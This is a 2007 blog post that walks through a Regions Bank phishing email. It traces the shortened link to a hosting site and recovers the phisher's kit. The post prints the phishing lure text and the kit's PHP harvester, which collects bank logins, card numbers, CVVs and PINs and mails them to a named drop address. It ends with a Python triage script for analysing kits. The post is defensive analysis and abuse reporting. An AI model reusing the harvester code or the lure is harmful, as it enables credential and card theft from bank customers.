Monday, November 19, 2007

Walking through a phish site.

I just received this email in my inbox and figured some readers would enjoy some light reading.

Online Banking

Dear Regions Bank member,


We'd like to inform you that your Message Center has 1 new message. Please log in immediately and read the message. The Message Center contains only important information about your account and online banking.

Please follow this link in order to read your message:

http://tinyurl.com/2qzwsr

Choosing to ignore this message will result in a temporary suspension of your account within 24 hours, until you choose to solve this unpleasant situation.

Sincerely,
RegionsNet Online Banking
All of my phish emails go to CastleCops, and I enjoy helping them out by doing the first bit of research on my own. I started by figuring out where the TinyURL is pointing. You can do this by setting a cookie "preview=1" before visiting the page, fetching the page with wget, or running a proxy like Paros or WebScarab. According to TinyURL, the 2qzwsr redirect points to "http:// backup.iirt .net/ icons/ www.regions bank.com/ EBanking/ logon/" where we are greeted with:


Now phishers aren't the brightest bunch. In fact the majority of them are downright stupid. By backing up a few directories, we're able to find an open index. It was probably accidentally left open by the webmaster. The stupid part is, the phisher didn't even bother to remove his kit: "http://backup. iirt.net/ icons/ regions.tgz"

In the archive we find: /www.regionsbank.com/EBanking/logon/done.php:

<?php
session_start();

// The login credentials were captured on an earlier page of the kit and stashed in the session
$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
// Everything else comes from the "verify your details" form that posts to done.php
// ($HTTP_POST_VARS / $HTTP_SERVER_VARS are the old long-form superglobals, removed in PHP 5.4)
$name = $HTTP_POST_VARS['name'];
$address = $HTTP_POST_VARS['address'];
$city = $HTTP_POST_VARS['city'];
$state = $HTTP_POST_VARS['state'];
$zip = $HTTP_POST_VARS['zip'];
$p1 = $HTTP_POST_VARS['p1'];
$p2 = $HTTP_POST_VARS['p2'];
$p3 = $HTTP_POST_VARS['p3'];
$card = $HTTP_POST_VARS['card'];
$expm = $HTTP_POST_VARS['expm'];
$expy = $HTTP_POST_VARS['expy'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
$date = date("D M d, Y g:i a");

//sending email info here
$subj = "| CC: $card | EXP: $expm/$expy | CVV: $cvv | PIN: $pin |";
$msg = "Username: $j_username\nPassword: $j_password\nCardHolder Name: $name\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nPhone Number: $p1-$p2-$p3\nCredit Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\n\n[ IP: $ip | $date ]";
$from = "From: Regions Bank";
// Exfiltrate the harvested record to the drop mailbox
mail("peacolo3@yahoo.com", $subj, $msg, $from);
// Bounce the victim to the real bank so nothing looks amiss
header("Location: http://www.regions.com");

?>
So victim data is emailed to peacolo3@yahoo.com. We could send Mr Peacolo a nice email, but that could be considered baiting him...and we'd never do that...right? :)
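As an added example (my own triage helper, not part of the original post or the kit), here is the kind of script I run over a recovered kit to pull out the drop address, the fields the victim was asked for, and the post-submit redirect. The embedded PHP is trimmed from the done.php above; a real run would feed it every .php file in the extracted archive.

```python
import re

# Snippet of the kit's done.php as quoted in the post (trimmed to the lines that
# matter for triage). Constructed sample input; not the full file.
DONE_PHP = r'''<?php
session_start();
$j_username = $_SESSION['j_username'];
$j_password = $_SESSION['j_password'];
$card = $HTTP_POST_VARS['card'];
$cvv = $HTTP_POST_VARS['cvv'];
$pin = $HTTP_POST_VARS['pin'];
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
mail("peacolo3@yahoo.com", $subj, $msg, $from);
header("Location: http://www.regions.com");
?>'''

# First argument of mail(): the "drop" mailbox the victim data is exfiltrated to.
MAIL_RE = re.compile(r'''\bmail\s*\(\s*(['"])([^'"]+)\1''')
# Form/session keys the script reads: shows exactly what the victim was asked for.
INPUT_RE = re.compile(
    r'''\$(?:HTTP_POST_VARS|HTTP_GET_VARS|_POST|_GET|_REQUEST|_SESSION)'''
    r'''\s*\[\s*['"]([^'"]+)['"]\s*\]''')
# Where the victim is bounced afterwards, usually the real bank to avoid suspicion.
REDIRECT_RE = re.compile(r'''header\s*\(\s*['"]Location:\s*([^'"]+)['"]''')

# Field names that mark a script as a credential/card harvester rather than a plain form.
SENSITIVE = {"password", "pass", "pin", "card", "cvv", "cvv2", "ssn", "j_password"}

def triage_kit_file(src):
    """Return drop addresses, captured fields, redirect and a verdict for one PHP file."""
    drops = sorted({m.group(2) for m in MAIL_RE.finditer(src)})
    fields = sorted(set(INPUT_RE.findall(src)))
    sensitive_hits = sorted(f for f in fields if f.lower() in SENSITIVE)
    redirect = REDIRECT_RE.search(src)
    return {
        "drops": drops,
        "fields": fields,
        "sensitive": sensitive_hits,
        "redirect": redirect.group(1) if redirect else None,
        # Verdict: exfiltration via mail() plus sensitive fields = harvester script.
        "is_harvester": bool(drops) and bool(sensitive_hits),
    }

if __name__ == "__main__":
    for key, value in triage_kit_file(DONE_PHP).items():
        print(f"{key}: {value}")
```

The drop address and redirect are what go into the abuse report (to the mailbox provider and the hosting contact respectively); the field list tells the bank which customer data to treat as compromised.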

Emails were sent to hostmaster@iirt.net and the phish was forwarded to CastleCops.

So grab your line, and go anti-phishing. -- For what it's worth, TinyURL killed the site while I was writing this. Good job TinyURL.


1 Comment:

Blogger Simon said...

Damn, and their PHP, calling mail without validating the user input, isn't proof against spambots either ;)

23 November, 2007 12:13  
